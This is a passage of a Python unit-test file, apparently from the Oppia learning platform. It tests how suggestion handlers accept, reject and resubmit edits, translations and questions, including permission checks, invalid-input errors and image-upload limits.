feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
# Invalid format of suggestion id.
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'], 'invalid_suggestion_id'), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'Invalid format for suggestion_id. It must contain 3 parts '
'separated by \'.\'')
csrf_token = self.get_new_csrf_token()
# Suggestion does not exist.
self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
'exploration.target_id.id'), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token,
expected_status_int=404)
self.logout()
def test_suggestion_to_exploration_handler_with_invalid_target_type(self):
self.login(self.EDITOR_EMAIL)
question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_id'],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
exp_id = 'new_exp_id'
self.save_new_default_exploration(exp_id, self.editor_id)
suggestion_services.create_suggestion(
feconf.SUGGESTION_TYPE_ADD_QUESTION,
feconf.ENTITY_TYPE_TOPIC, exp_id, 1,
self.author_id, {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': question_dict,
'skill_id': None,
'skill_difficulty': 0.3
}, None)
suggestion_id = suggestion_services.query_suggestions(
[('author_id', self.author_id), (
'target_id', exp_id)])[0].suggestion_id
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, exp_id,
suggestion_id), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'This handler allows actions only on suggestions to explorations.')
self.logout()
def test_suggestion_to_exploration_handler_with_invalid_target_id(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
self.save_new_default_exploration('exp_id', self.editor_id)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, 'exp_id',
suggestion_to_accept['suggestion_id']), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'The exploration id provided does not match the exploration id '
'present as part of the suggestion_id')
self.logout()
def test_owner_of_exploration_cannot_repond_to_own_suggestion(self):
self.login(self.EDITOR_EMAIL)
exp_id = 'new_exp_id'
self.save_new_default_exploration(exp_id, self.editor_id)
new_content = state_domain.SubtitledHtml(
'content', '<p>new content html</p>').to_dict()
change_cmd = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'new_value': new_content
}
suggestion_services.create_suggestion(
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT,
feconf.ENTITY_TYPE_EXPLORATION, exp_id, 1,
self.editor_id, change_cmd, 'sample description')
suggestion_id = suggestion_services.query_suggestions(
[('author_id', self.editor_id), (
'target_id', exp_id)])[0].suggestion_id
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
exp_id, suggestion_id), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=401)
self.assertEqual(
response['error'], 'You cannot accept/reject your own suggestion.')
self.logout()
def test_suggestion_to_exploration_handler_with_invalid_action(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']),
{'action': 'invalid_action'}, csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid action.')
self.logout()
def test_reject_suggestion_to_exploration(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_reject = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_reject['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_reject['target_id'],
suggestion_to_reject['suggestion_id']), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token)
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_reject['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_REJECTED)
self.logout()
def test_suggestion_to_exploration_handler_with_long_commit_mesage(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
response = self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message':
u'a' * (feconf.MAX_COMMIT_MESSAGE_LENGTH + 1),
'review_message': u'Accepted'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'Commit messages must be at most 1000 characters long.'
)
def test_accept_suggestion(self):
exploration = exp_fetchers.get_exploration_by_id(self.EXP_ID)
# Test editor can accept successfully.
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
# By default, when a suggestion is accepted and the recording of scores
# is enabled, the score of the author of that suggestion is increased
# by 1. Therefore, by setting that increment to the minimum score
# required to review, we can ensure that the author of this suggestion
# has a high enough score to review suggestions in this category. This
# will be used to test whether the author can review a suggestion in
# the same category because of the author's high score in a later test.
enable_recording_of_scores_swap = self.swap(
feconf, 'ENABLE_RECORDING_OF_SCORES', True)
increment_score_of_author_swap = self.swap(
suggestion_models, 'INCREMENT_SCORE_OF_AUTHOR_BY',
feconf.MINIMUM_SCORE_REQUIRED_TO_REVIEW)
with enable_recording_of_scores_swap, increment_score_of_author_swap:
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
exploration = exp_fetchers.get_exploration_by_id(self.EXP_ID)
self.assertEqual(
exploration.states[suggestion_to_accept[
'change']['state_name']].content.html,
suggestion_to_accept['change']['new_value']['html'])
self.logout()
# Testing user without permissions cannot accept.
self.login(self.NORMAL_USER_EMAIL)
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token, expected_status_int=401)
self.logout()
# Testing that author cannot accept own suggestion.
self.login(self.AUTHOR_EMAIL_2)
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token, expected_status_int=401)
# Testing users with scores above threshold can accept.
# The score of this author was increased to the review threshold amount
# when the editor accepted a suggestion that was authored by this user.
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][0]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
self.logout()
# Testing admins can accept suggestions.
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][1]
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][1]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
self.logout()
def test_suggestion_list_handler_with_invalid_query_field(self):
response = self.get_json(
'%s?invalid_query_field=value' % (
feconf.SUGGESTION_LIST_URL_PREFIX), expected_status_int=400)
self.assertEqual(
response['error'],
'Not allowed to query on field invalid_query_field')
def test_suggestion_list_handler(self):
suggestions = self.get_json(
'%s?author_id=%s&target_type=%s&target_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX, self.author_id_2,
feconf.ENTITY_TYPE_EXPLORATION, self.EXP_ID)
)['suggestions']
self.assertEqual(len(suggestions), 2)
def test_cannot_resubmit_suggestion_with_invalid_suggestion_id(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/resubmit/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, 'invalid_suggestion_id'), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'No suggestion found with given suggestion id')
def test_resubmit_rejected_suggestion(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion = suggestion_services.query_suggestions(
[('author_id', self.author_id), ('target_id', self.EXP_ID)])[0]
suggestion_services.reject_suggestion(
suggestion.suggestion_id, self.reviewer_id, 'reject message')
self.logout()
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json('%s/resubmit/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, suggestion.suggestion_id), {
'summary_message': 'summary message',
'action': u'resubmit',
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'new_value': self.resubmit_change_content,
'old_value': self.old_content
}
}, csrf_token=csrf_token)
suggestion = suggestion_services.query_suggestions(
[('author_id', self.author_id), ('target_id', self.EXP_ID)])[0]
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
self.assertEqual(
suggestion.change.new_value['html'],
self.resubmit_change_content['html'])
self.assertEqual(
suggestion.change.cmd, exp_domain.CMD_EDIT_STATE_PROPERTY)
self.assertEqual(
suggestion.change.property_name, exp_domain.STATE_PROPERTY_CONTENT)
self.assertEqual(
suggestion.change.state_name, 'State 1')
self.logout()
def test_translation_accept_suggestion_by_reviewer(self):
# Test reviewer can accept successfully.
self.login(self.REVIEWER_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.translator_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.translator_id))['suggestions'][0]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
self.logout()
def test_translation_suggestion_creation_with_new_images(self):
exp_id = '12345678exp1'
exploration = (
self.save_new_linear_exp_with_state_names_and_interactions(
exp_id, self.editor_id, ['State 1'],
['EndExploration'], category='Algebra'))
state_content_dict = {
'content_id': 'content',
'html': (
'<oppia-noninteractive-image filepath-with-value='
'""img.png"" caption-with-value="""" '
'alt-with-value=""Image"">'
'</oppia-noninteractive-image>')
}
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
with python_utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'img.png'),
'rb', encoding=None) as f:
raw_image = f.read()
self.post_json(
'%s/exploration/%s' % (self.IMAGE_UPLOAD_URL_PREFIX, exp_id),
{'filename': 'img.png'},
csrf_token=csrf_token,
upload_files=(('image', 'unused_filename', raw_image),))
exp_services.update_exploration(
self.editor_id, exp_id, [exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'new_value': state_content_dict
})], 'Changes content.')
rights_manager.publish_exploration(self.editor, exp_id)
exploration = exp_fetchers.get_exploration_by_id(exp_id)
text_to_translate = exploration.states['State 1'].content.html
self.logout()
fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(feconf.ENTITY_TYPE_EXPLORATION, exp_id))
self.assertTrue(fs.isfile('image/img.png'))
self.login(self.TRANSLATOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': feconf.ENTITY_TYPE_EXPLORATION,
'target_id': exp_id,
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_ADD_TRANSLATION,
'state_name': 'State 1',
'content_id': 'content',
'language_code': 'hi',
'content_html': text_to_translate,
'translation_html': (
'<oppia-noninteractive-image filepath-with-value='
'""translation_image.png"" '
'caption-with-value="""" '
'alt-with-value=""Image"">'
'</oppia-noninteractive-image>')
},
}, csrf_token=csrf_token,
upload_files=(
('translation_image.png', 'translation_image.png', raw_image), )
)
fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(
feconf.IMAGE_CONTEXT_EXPLORATION_SUGGESTIONS, exp_id))
self.assertTrue(fs.isfile('image/img.png'))
self.assertTrue(fs.isfile('image/img_compressed.png'))
self.assertTrue(fs.isfile('image/translation_image.png'))
self.assertTrue(fs.isfile('image/img_compressed.png'))
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.translator_id))['suggestions'][0]
self.logout()
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'Translated content of State 1',
'review_message': u'This looks good!',
}, csrf_token=csrf_token)
fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(feconf.ENTITY_TYPE_EXPLORATION, exp_id))
self.assertTrue(fs.isfile('image/img.png'))
self.assertTrue(fs.isfile('image/translation_image.png'))
self.assertTrue(fs.isfile('image/img_compressed.png'))
class QuestionSuggestionTests(test_utils.GenericTestBase):
AUTHOR_EMAIL = 'author@example.com'
AUTHOR_EMAIL_2 = 'author2@example.com'
# Needs to be 12 characters long.
SKILL_ID = 'skill1234567'
SKILL_DESCRIPTION = 'skill to link question to'
def setUp(self):
super(QuestionSuggestionTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
self.save_new_skill(
self.SKILL_ID, self.admin_id, description=self.SKILL_DESCRIPTION)
self.question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': [self.SKILL_ID],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.SKILL_ID,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token)
self.logout()
def test_query_question_suggestions(self):
suggestions = self.get_json(
'%s?suggestion_type=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
feconf.SUGGESTION_TYPE_ADD_QUESTION)
)['suggestions']
self.assertEqual(len(suggestions), 1)
suggestion = suggestions[0]
self.assertEqual(
suggestion['suggestion_type'],
feconf.SUGGESTION_TYPE_ADD_QUESTION)
self.assertEqual(suggestion['target_id'], self.SKILL_ID)
self.assertEqual(
suggestion['target_type'], feconf.ENTITY_TYPE_SKILL)
self.assertEqual(
suggestion['change']['cmd'],
question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION)
def test_accept_question_suggestion(self):
suggestion_to_accept = self.get_json(
'%s?suggestion_type=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
feconf.SUGGESTION_TYPE_ADD_QUESTION)
)['suggestions'][0]
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
self.put_json('%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'This looks good!',
'skill_id': self.SKILL_ID
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?suggestion_type=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
feconf.SUGGESTION_TYPE_ADD_QUESTION)
)['suggestions'][0]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
(
questions, merged_question_skill_links, _) = (
question_services.get_displayable_question_skill_link_details(
1, [self.SKILL_ID], ''))
self.assertEqual(len(questions), 1)
self.assertEqual(
merged_question_skill_links[0].skill_descriptions,
[self.SKILL_DESCRIPTION])
self.assertEqual(
merged_question_skill_links[0].skill_difficulties, [0.3])
self.assertEqual(
questions[0].question_content,
self.question_dict['question_state_data']['content']['html']
)
thread_messages = feedback_services.get_messages(
suggestion_to_accept['suggestion_id'])
last_message = thread_messages[len(thread_messages) - 1]
self.assertEqual(last_message.text, 'This looks good!')
def test_suggestion_creation_with_valid_images(self):
self.save_new_skill(
'skill_id2', self.admin_id, description='description')
question_state_data_dict = self._create_valid_question_data(
'default_state').to_dict()
valid_html = (
'<oppia-noninteractive-math math_content-with-value="{&q'
'uot;raw_latex&quot;: &quot;(x - a_1)(x - a_2)(x - a'
'_3)...(x - a_n-1)(x - a_n)&quot;, &quot;svg_filenam'
'e&quot;: &quot;file.svg&quot;}"></oppia-noninte'
'ractive-math>'
)
question_state_data_dict['content']['html'] = valid_html
self.question_dict = {
'question_state_data': question_state_data_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_id2'],
'inapplicable_skill_misconception_ids': []
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
with python_utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'test_svg.svg'),
'rb', encoding=None) as f:
raw_image = f.read()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.SKILL_ID,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token, upload_files=(
('file.svg', 'file.svg', raw_image), ))
self.logout()
def test_suggestion_creation_when_images_are_not_provided(self):
self.save_new_skill(
'skill_id2', self.admin_id, description='description')
question_state_data_dict = self._create_valid_question_data(
'default_state').to_dict()
valid_html = (
'<oppia-noninteractive-math math_content-with-value="{&q'
'uot;raw_latex&quot;: &quot;(x - a_1)(x - a_2)(x - a'
'_3)...(x - a_n-1)(x - a_n)&quot;, &quot;svg_filenam'
'e&quot;: &quot;file.svg&quot;}"></oppia-noninte'
'ractive-math>'
)
question_state_data_dict['content']['html'] = valid_html
self.question_dict = {
'question_state_data': question_state_data_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_id2'],
'inapplicable_skill_misconception_ids': []
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
response_dict = self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.SKILL_ID,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertIn(
'No image data provided for file with name file.svg.',
response_dict['error'])
self.logout()
def test_suggestion_creation_when_images_are_not_valid(self):
self.save_new_skill(
'skill_id2', self.admin_id, description='description')
question_state_data_dict = self._create_valid_question_data(
'default_state').to_dict()
valid_html = (
'<oppia-noninteractive-math math_content-with-value="{&q'
'uot;raw_latex&quot;: &quot;(x - a_1)(x - a_2)(x - a'
'_3)...(x - a_n-1)(x - a_n)&quot;, &quot;svg_filenam'
'e&quot;: &quot;file.svg&quot;}"></oppia-noninte'
'ractive-math>'
)
question_state_data_dict['content']['html'] = valid_html
self.question_dict = {
'question_state_data': question_state_data_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_id2'],
'inapplicable_skill_misconception_ids': []
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
large_image = '<svg><path d="%s" /></svg>' % (
'M150 0 L75 200 L225 200 Z ' * 4000)
response_dict = self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.SKILL_ID,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token,
upload_files=(
('file.svg', 'file.svg', large_image),),
expected_status_int=400)
self.assertIn(
'Image exceeds file size limit of 100 KB.',
response_dict['error'])
self.logout()
class SkillSuggestionTests(test_utils.GenericTestBase):
AUTHOR_EMAIL = 'author@example.com'
REVIEWER_EMAIL = 'reviewer@example.com'
def setUp(self):
super(SkillSuggestionTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
user_services.allow_user_to_review_question(self.reviewer_id)
self.skill_id = skill_services.get_new_skill_id()
self.save_new_skill(
self.skill_id, self.admin_id, description='Description')
self.question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': [self.skill_id],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.skill_id,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.skill_id,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token)
self.logout()
def test_cannot_access_suggestion_to_skill_handler(self):
self.login(self.ADMIN_EMAIL)
thread_id = feedback_services.create_thread(
feconf.ENTITY_TYPE_QUESTION, self.skill_id,
self.author_id, 'description', '', has_suggestion=True)
csrf_token = self.get_new_csrf_token()
self.put_json(
'%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, self.skill_id,
thread_id), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.logout()
def test_suggestion_to_skill_handler_with_invalid_target_type(self):
self.login(self.ADMIN_EMAIL)
exp_id = 'new_exp_id'
self.save_new_default_exploration(exp_id, self.admin_id)
new_content = state_domain.SubtitledHtml(
'content', '<p>new content html</p>').to_dict()
change_cmd = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'new_value': new_content
}
suggestion_services.create_suggestion(
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT,
feconf.ENTITY_TYPE_EXPLORATION, exp_id, 1,
self.author_id, change_cmd, 'sample description')
suggestion_id = suggestion_services.query_suggestions(
[('author_id', self.author_id), (
'target_id', exp_id)])[0].suggestion_id
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
response = self.put_json(
'%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
self.skill_id, suggestion_id), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'This handler allows actions only on suggestions to skills.')
self.logout()
def test_suggestion_to_skill_handler_with_invalid_target_id(self):
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
response = self.put_json(
'%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
'skill_id', suggestion_to_accept['suggestion_id']),
{
'action': u'reject',
'review_message': u'Rejected!'
},
csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'The skill id provided does not match the skill id '
'present as part of the suggestion_id')
self.logout()
def test_suggestion_to_skill_handler_with_invalid_action(self):
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
response = self.put_json(
'%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
